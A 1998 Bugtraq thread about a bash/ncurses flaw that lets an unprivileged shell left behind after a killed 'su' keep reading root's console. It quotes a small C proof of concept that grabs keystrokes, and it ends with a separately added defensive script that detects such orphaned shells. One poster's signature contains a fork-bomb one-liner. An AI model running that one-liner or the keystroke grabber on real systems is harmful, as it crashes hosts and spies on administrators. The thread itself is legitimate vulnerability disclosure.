[6273] in bugtraq


Re: bash 2.01 / ncurses 4.1 console takeover "feature"

daemon@ATHENA.MIT.EDU (Savochkin Andrey Vladimirovich)
Tue Mar 10 19:03:40 1998

Date: 	Tue, 10 Mar 1998 11:08:25 +0300
Reply-To: Savochkin Andrey Vladimirovich <saw@MSU.RU>
From: Savochkin Andrey Vladimirovich <saw@MSU.RU>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To:  <01bd4a04$7f7f0f80$LocalHost@LCAMTUF>; from Michal Zalewski on
              Sat, Mar 07, 1998 at 09:06:21PM +0100

The described problem isn't a serious one.
If user 'lcam' wants to take control over root's terminal,
first of all he should force root to perform 'su lcam'.
So an attacker could take control over root's terminal
only in the case of an inexperienced superuser su'ing to unprivileged users.

Nevertheless, 'su' from the SimplePAMApps package developed by
Andrew Morgan <morgan@transmeta.com> is free of such a problem.
The program doesn't allow an unprivileged user to kill it.

Regards,
                                        Andrey V.
                                        Savochkin


On Sat, Mar 07, 1998 at 09:06:21PM +0100, Michal Zalewski wrote:
> With bash 2.01 and ncurses 4.1, any program launched at an unprivileged
> uid (e.g. from an 'su' shell) may take over a privileged user's console
> (to grab keystrokes or something else). I found it's quite easy when
> I tried to kill 'su' directly from the unprivileged shell with signal 9:
>
> [root@genome /]# su lcam
> [lcam@genome /]$ killall -9 su
> Killed
> [root@genome /]#
>
> That was normal, but suddenly I saw again old prompt:
>
> [lcam@genome /]$
>
> From this point, two bash instances (the unprivileged one hasn't been
> killed with su!) were controlling my console at once... It looks
> just curious:
>
> [root@genome /]# id
> uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
> [lcam@genome /]$ id
> uid=502(lcam) gid=502(lcam) groups=502(lcam)
> [lcam@genome /]$
> [root@genome /]#
>
> Of course, it isn't so scary, because it has been done manually...
> But it can be easily used in a nasty program. A typical administrator
> believes that only the unprivileged account may be compromised when
> he's launching something on it, and usually he's right, but
> ncurses has a vulnerability which may be used to fool him. Unlike
> other lame su tricks, it's quite invisible (he may check on a
> second console - he's back in his REAL, root shell, but we can
> still control his console). I wrote a simple program (it may even be
> launched from ~/.bashrc; in the meantime, su should be killed), which
> is able to grab keystroke(s) from the console:
>
> -- test.c --
> // gcc test.c -lncurses -o anything
> #include <curses.h>
> #include <stdlib.h>   /* system() */
>
> /* Put the controlling terminal into raw, no-echo mode and read keys
>  * from it; run a command when an 'x' arrives. */
> int main(void) {
>   initscr();
>   noecho();
>   raw();
>   while (1)
>     if (getch() == 'x') system("touch /tmp/VOILA");
> }
> -- eof --
>
> It isn't perfect, actually it grabs only one of the first 'x's, and fails
> to grab the next ones (a lot of i/o errors when debugged ;-). But it
> CAN do that. For sure it's possible to keep control much longer, as
> shown above (bash example). Maybe it's even possible to do it
> after logout, I haven't checked it.
>
> _______________________________________________________________________
> Michał Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw.pl]
> To iterate is human, to recurse divine [P. Deutsch]
> =--------------- [ echo "\$0&\$0">_;chmod +x _;./_ ] -----------------=
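The check both posters circle around (Michal's "he may check on a second console", Andrey's point that the attack needs a killed su) can be done from that second console by looking at who is still attached to the terminal. Below is an added example, not code from either post: a POSIX sh function that takes the output of `ps -eo pid,ppid,pgid,sid,uid,tty,comm` and flags processes that sit on a real tty, have been reparented to init (their su or login is gone), are not the session leader themselves, and run as a different uid from that session's leader. The embedded ps table is constructed to mirror the state in the post (root's bash on tty1, su killed, the lcam bash orphaned but still on tty1); the pid numbers and the function names are the example's own.

```sh
#!/bin/sh
# Added example, not from the original posts. Input: the table printed by
#   ps -eo pid,ppid,pgid,sid,uid,tty,comm
# A process is reported when it has a controlling tty, its parent is init
# (ppid 1, i.e. the su/login that started it has died), it is not a session
# leader itself, and its uid differs from the uid of the session leader.

# Print the uid of the session leader (pid == sid) of session $1,
# reading the ps table from $2. Prints nothing if the leader is not listed.
leader_uid_of() {
    printf '%s\n' "$2" | while read -r pid ppid pgid sid uid tty comm; do
        if [ "$pid" = "$1" ] && [ "$sid" = "$1" ]; then
            printf '%s' "$uid"
        fi
    done
}

# Print one line per suspicious process: "<pid> uid=<uid> tty=<tty> <comm>".
flag_orphans_on_tty() {
    table=$1
    printf '%s\n' "$table" | while read -r pid ppid pgid sid uid tty comm; do
        case $pid in ''|*[!0-9]*) continue ;; esac   # skip the header line
        [ "$tty" != '?' ] || continue                 # no controlling tty
        [ "$ppid" = 1 ] || continue                   # parent still alive
        [ "$pid" != "$sid" ] || continue              # session leaders are fine
        owner=$(leader_uid_of "$sid" "$table")
        [ -n "$owner" ] && [ "$owner" != "$uid" ] || continue
        printf '%s uid=%s tty=%s %s\n' "$pid" "$uid" "$tty" "$comm"
    done
}

# Constructed snapshot (not real ps output) mirroring the post: login (401)
# leads the tty1 session, root's bash (402) is where 'su lcam' was typed,
# the su itself has been killed, and the lcam bash (411) it spawned now
# hangs off init but still reads tty1.
SAMPLE_PS='  PID  PPID  PGID   SID   UID TT       COMMAND
    1     0     1     1     0 ?        init
  401     1   401   401     0 tty1     login
  402   401   402   401     0 tty1     bash
  411     1   411   401   502 tty1     bash
  420   402   420   401     0 tty1     ps'

flag_orphans_on_tty "$SAMPLE_PS"
# On a live box, from another console:
#   flag_orphans_on_tty "$(ps -eo pid,ppid,pgid,sid,uid,tty,comm)"
```

The rule is deliberately narrow: a leftover shell that was started by a still-living su has ppid equal to the su and is not reported, and a process with no controlling terminal cannot read keystrokes from one. It is a sanity check for the scenario in the thread, not a general detector; an orphan that execs something other than bash still shows up, since the test is on the process tree rather than the command name.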
